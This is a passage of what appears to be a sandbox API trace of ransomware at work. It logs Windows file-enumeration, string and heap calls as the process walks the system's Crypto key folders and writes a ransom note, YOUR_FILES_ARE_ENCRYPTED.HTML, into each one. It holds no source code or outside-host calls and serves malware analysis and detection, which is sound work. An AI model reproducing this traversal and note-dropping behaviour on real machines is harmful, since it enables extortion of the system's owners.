lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" [0109.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*" [0109.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae4a94d6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.857] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae4a94d6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0109.857] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4a94d6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae4a94d6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae4ae434, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.857] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4a94d6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae4a94d6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae4ae434, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.857] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.858] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0109.858] GetProcessHeap () returned 0x600000 [0109.858] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.858] GetProcessHeap () returned 0x600000 [0109.858] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.858] GetProcessHeap () returned 0x600000 [0109.858] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.858] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="PCPKSP", cAlternateFileName="")) returned 1 [0109.858] StrStrIW (lpFirst="PCPKSP", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.858] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP") returned 46 [0109.859] GetProcessHeap () returned 0x600000 [0109.859] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.859] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP" [0109.859] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*" [0109.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae4cb794, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.859] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae4cb794, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0109.860] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="WindowsAIK", cAlternateFileName="WINDOW~1")) returned 1 [0109.860] StrStrIW (lpFirst="WindowsAIK", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.860] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK") returned 57 [0109.860] GetProcessHeap () returned 0x600000 [0109.860] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.861] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK" [0109.861] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*" [0109.861] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae4c0780, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x630690, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0109.861] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae4c0780, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x630690, cFileName="..", cAlternateFileName="")) returned 1 [0109.861] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4c0780, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae4c0780, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae4c6d50, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.861] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4c0780, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae4c0780, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae4c6d50, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6363f0, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.861] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0109.861] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0109.861] GetProcessHeap () returned 0x600000 [0109.861] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0109.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.861] GetProcessHeap () returned 0x600000 [0109.862] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0109.862] GetProcessHeap () returned 0x600000 [0109.862] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.862] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4cb794, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae4cb794, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5026e5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.862] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4cb794, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae4cb794, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5026e5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.862] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.863] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0109.863] GetProcessHeap () returned 0x600000 [0109.863] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.863] GetProcessHeap () returned 0x600000 [0109.863] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.863] GetProcessHeap () returned 0x600000 [0109.863] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.863] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc4a8a1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="RSA", cAlternateFileName="")) returned 1 [0109.864] StrStrIW (lpFirst="RSA", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.864] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned 43 [0109.864] GetProcessHeap () returned 0x600000 [0109.864] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.864] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" [0109.864] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*" [0109.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xae52d1b7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.865] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xae52d1b7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0109.865] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0109.865] StrStrIW (lpFirst="MachineKeys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.865] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 55 [0109.865] GetProcessHeap () returned 0x600000 [0109.865] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.866] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" [0109.866] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*" [0109.866] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae5123ee, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c1a8, dwReserved1=0x630690, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0109.866] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae5123ee, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c1a8, dwReserved1=0x630690, cFileName="..", cAlternateFileName="")) returned 1 [0109.866] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5123ee, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae5123ee, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5185b2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c1a8, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.866] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5123ee, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae5123ee, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5185b2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c1a8, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.866] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0109.866] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0109.866] GetProcessHeap () returned 0x600000 [0109.866] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0109.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.867] GetProcessHeap () returned 0x600000 [0109.867] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0109.867] GetProcessHeap () returned 0x600000 [0109.867] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.867] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0109.867] StrStrIW (lpFirst="S-1-5-18", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.867] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned 52 [0109.868] GetProcessHeap () returned 0x600000 [0109.868] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.868] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18" [0109.868] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*" [0109.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xae523547, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c1a8, dwReserved1=0x630690, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.869] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xae523547, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c1a8, dwReserved1=0x630690, cFileName="..", cAlternateFileName="")) returned 1 [0109.869] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xc70b72, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc70b72, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x63c1a8, dwReserved1=0x630690, cFileName="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="4ECCD1~1")) returned 1 [0109.869] StrStrIW (lpFirst="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.869] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned 122 [0109.869] PathFindExtensionW 